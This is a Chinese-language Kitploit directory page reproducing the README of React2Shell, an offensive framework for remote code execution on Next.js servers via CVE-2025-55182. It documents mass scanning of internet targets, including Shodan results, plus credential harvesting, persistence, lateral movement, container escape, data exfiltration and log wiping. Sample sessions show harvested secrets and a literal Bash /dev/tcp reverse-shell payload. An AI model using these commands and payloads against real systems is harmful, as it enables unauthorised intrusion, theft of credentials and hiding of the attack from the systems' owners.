Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
React2Shell — R2S是一个全面的利用和后利用框架,针对Next.js React Server Components漏洞(CVE-2025-55182)。它提供具有高级功能的交互式shell,用于渗透测试,包括文件传输、持久化、枚举、权限提升检查等。 | Kitploit
工具/GitHubGitHub/4nuxd/react2shell
渗透测试框架权限提升漏洞利用框架持久化机制横向移动Web应用程序漏洞利用数据泄露后渗透利用命令与控制容器逃逸
GitHub4nuxd/react2shell
569个月前尚未审核

React2Shell

R2S是一个全面的利用和后利用框架,针对Next.js React Server Components漏洞(CVE-2025-55182)。它提供具有高级功能的交互式shell,用于渗透测试,包括文件传输、持久化、枚举、权限提升检查等。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 R2S - Next.js RSC 漏洞利用框架

版本 Python 许可证 CVE

用于 Next.js React Server Components RCE 的高级后渗透利用框架

特性 • 安装 • 使用 • [命令](#-交互式 shell 命令) • 示例


📋 概述

R2S 是一个针对 Next.js React Server Components 漏洞(CVE-2025-55182)的综合性利用与后渗透利用框架。它提供了一个交互式 shell,具备高级功能,可用于渗透测试,包括文件传输、持久化、枚举、权限提升检测等。

🎯 关键能力

  • ✅ 自动化漏洞扫描 - 批量扫描多个目标
  • ✅ 交互式 RCE shell - 带目录导航的状态化命令执行
  • ✅ 基于 HTTP 的文件传输 - 上传/下载文件,无 base64 限制
  • ✅ 反向 shell 自动化 - 尝试 25+ 种不同的反向 shell 载荷
  • ✅ 高级枚举 - 系统、网络、容器和云元数据
  • ✅ 权限提升 - 自动检测提权向量
  • ✅ 凭据收集 - 提取密码、密钥、令牌和机密
  • ✅ 持久化机制 - 维持跨重启的访问权限
  • ✅ 横向移动 - 发现并跳转到其他主机
  • ✅ 容器逃逸 - 检查 Docker/Kubernetes 逃逸向量
  • ✅ 数据渗漏 - 提取敏感文件和配置
  • ✅ 隐秘操作 - 清除日志并隐藏痕迹

🔥 特性

🌐 核心利用

  • 批量扫描,支持多线程
  • 管道模式,用于与其他工具集成
  • 自动漏洞检测,针对 Next.js RSC
  • 状态化交互式 shell,保持工作目录

📁 文件操作

  • 基于 HTTP 的上传 - 通过 wget/curl 将文件传输到目标
  • 基于 HTTP 的下载 - 通过 POST 请求渗漏文件
  • 无大小限制 - 适用于大文件(不像 base64 方法)
  • 自动 HTTP 服务器 - 按需启动/停止

🔍 侦察与枚举

  • 系统枚举 - 操作系统、内核、用户、进程
  • 网络发现 - 接口、路由、ARP、DNS、监听端口
  • 容器检测 - Docker、Kubernetes、LXC 识别
  • 云元数据 - 提取 AWS、GCP、Azure 凭据
  • 进程内存转储 - 从运行进程提取机密
  • 有趣文件发现 - SUID、可写目录、备份、配置文件

🔐 凭据收集

  • 环境变量(密码、API 密钥、令牌)
  • .env 文件和配置文件
  • SSH 私钥和 authorized_keys
  • 包含敏感命令的 Bash 历史
  • 数据库文件(SQLite、MySQL 转储)
  • 云凭据(AWS、Azure、GCP)
  • Git 凭据和 NPM 令牌
  • 浏览器数据(Cookie、登录数据)
  • Docker 和 Kubernetes 机密

⬆️ 权限提升

  • SUID/SGID 二进制文件检测
  • sudo 权限枚举
  • 可写系统文件(/etc/passwd、/etc/shadow)
  • Docker socket 访问检查
  • Linux 能力分析
  • 内核漏洞建议
  • Cron 作业枚举
  • PATH 劫持机会

🔄 后渗透利用

  • 持久化机制 - Cron 作业、.bashrc、systemd 服务
  • 高级持久化 - LD_PRELOAD、systemd 定时器
  • 端口扫描 - 内部网络侦察
  • 横向移动 - SSH 密钥发现、known_hosts 分析
  • 容器逃逸 - 特权容器检查、能力分析
  • 数据渗漏 - 自动收集敏感数据
  • 反向 shell 自动化 - 25+ 载荷类型,自动重试

🥷 隐秘与规避

  • 日志清理 - Bash 历史、auth 日志、syslog
  • 痕迹覆盖 - wtmp、lastlog 清理
  • 会话管理 - 保存和恢复会话

🛠️ 安装

前提条件

# Python 3.6 或更高版本
python3 --version

# 安装依赖
pip3 install requests urllib3

快速开始

# 克隆或下载工具
cd r2s-main

# 赋予可执行权限(可选)
chmod +x r2s_enhanced.py

# 运行工具
python3 r2s_enhanced.py -h

🚀 使用

基本语法

python3 r2s_enhanced.py [选项]

命令行选项

选项描述默认值
-u, --url单个目标 URL-
-l, --list包含 URL 列表的文件-
-c, --cmd初始执行的命令id
-t, --threads扫描线程数30
-p, --proxyHTTP 代理(如 http://127.0.0.1:8080)-
-v, --verbose启用详细输出False
--http-port用于文件传输的 HTTP 服务器端口8000

输入方式

1. 单个目标

python3 r2s_enhanced.py -u http://target.com

2. 多个目标(文件)

python3 r2s_enhanced.py -l targets.txt -t 50

3. 管道模式(标准输入)

cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 交互式 Shell 命令

获得 RCE 访问权限后,你将进入一个交互式 shell,可使用以下命令:

📂 文件传输

upload <本地文件> <远程路径>      # 上传文件到目标
download <远程文件> <本地路径>    # 从目标下载文件

🧭 导航

cd <目录>                         # 切换工作目录
pwd                              # 显示当前工作目录

🔍 枚举

enum                             # 完整系统枚举
privesc                          # 权限提升检查
harvest                          # 凭据收集
portscan <IP>                    # 扫描内部网络端口
memdump [PID]                    # 转储进程内存以获取机密

🎯 后渗透利用

lateral                          # 横向移动机会
escape                           # 容器逃逸向量
exfil [类型]                     # 渗漏数据(env/config/keys/db/logs/all)
reverse <lhost> <lport>          # 尝试多种反向 shell 载荷

🔒 持久化

persist                          # 添加基本持久化
advpersist                       # 添加高级持久化

🥷 隐秘

stealth                          # 清除日志并隐藏痕迹

💾 会话管理

save                             # 保存当前会话
help, ?                          # 显示帮助信息
exit, quit                       # 退出交互式 shell

🖥️ 系统命令

直接执行任何 shell 命令:

whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 示例

示例 1:基本利用

$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  </_ _/ _, _/ /__/  __/  
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   

   Next.js RSC 漏洞利用工具 (CVE-2025-55182)
   批量扫描器 & 管道版 (v4.1.0 - 增强版)

   >> 致谢 ( G4rxd )

[*] 已加载 1 个目标。使用 30 个线程开始扫描...
[*] 载荷命令: id

[VULN] http://vulnerable-app.com >>> RCE 成功
       输出: uid=1000(node) gid=1000(node) groups=1000(node)

[+] 状态化交互式 RCE shell 已启动。输入 'help' 查看命令。
[*] 高级功能: enum, privesc, persist, portscan, harvest, stealth
[*] 新功能: memdump, lateral, escape, exfil, advpersist, reverse

[+] HTTP 服务器已在 192.168.1.100:8000 启动

next-rce:/app$

示例 2:系统枚举

next-rce:/app$ enum

[*] 开始自动枚举...

============================================================
[*] 系统信息
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

============================================================
[*] 当前用户
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)

============================================================
[*] 容器检测
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker 容器已检测到]

...

示例 3:文件传输

# 上传文件
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] 正在通过 HTTP 上传 /tmp/exploit.sh (2048 字节)...
[+] 上传成功!
    -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh

# 下载文件
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] 正在通过 HTTP 下载 /etc/passwd...
[+] 下载成功! (1523 字节)
    已保存到: ./passwd.txt

示例 4:凭据收集

next-rce:/app$ harvest

[*] 正在收集凭据...

[*] 环境变量:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[*] .env 文件:
/app/.env
/app/.env.production
/var/www/.env.local

[*] SSH 密钥:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa

...

示例 5:反向 shell

next-rce:/app$ reverse 192.168.1.100 4444

[*] 开始向 192.168.1.100:4444 尝试反向 shell
[!] 请确保你已运行监听器: nc -lvnp 4444

[*] 正在尝试 25 种不同的反向 shell 载荷...

[1/25] 尝试 Bash TCP... ✓ 已执行
[?] 你收到连接了吗?(y/n/s 停止): y

[+] 成功! 反向 shell 已建立,使用: Bash TCP
[*] 载荷: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

示例 6:批量扫描

$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com

$ python3 r2s_enhanced.py -l targets.txt -t 50

[*] 已加载 3 个目标。使用 50 个线程开始扫描...

[VULN] http://app1.example.com >>> RCE 成功
[VULN] http://app3.example.com >>> RCE 成功

[*] 扫描完成。

示例 7:权限提升检查

next-rce:/app$ privesc

[*] 正在检查权限提升向量...

[*] SUID 二进制文件:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

[*] sudo 权限:
用户 node 可以运行以下命令:
    (ALL : ALL) NOPASSWD: /usr/bin/docker

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Docker 组:
在 docker 组中 - 可被利用!

...

示例 8:容器逃逸

next-rce:/app$ escape

[*] 正在检查容器逃逸向量...

[*] 容器类型:
12:devices:/docker/a1b2c3d4e5f6

[*] 特权容器:
PRIVILEGED

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] 能力:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[完全能力 - 容器具有特权]

...

🔧 高级特性

下载工具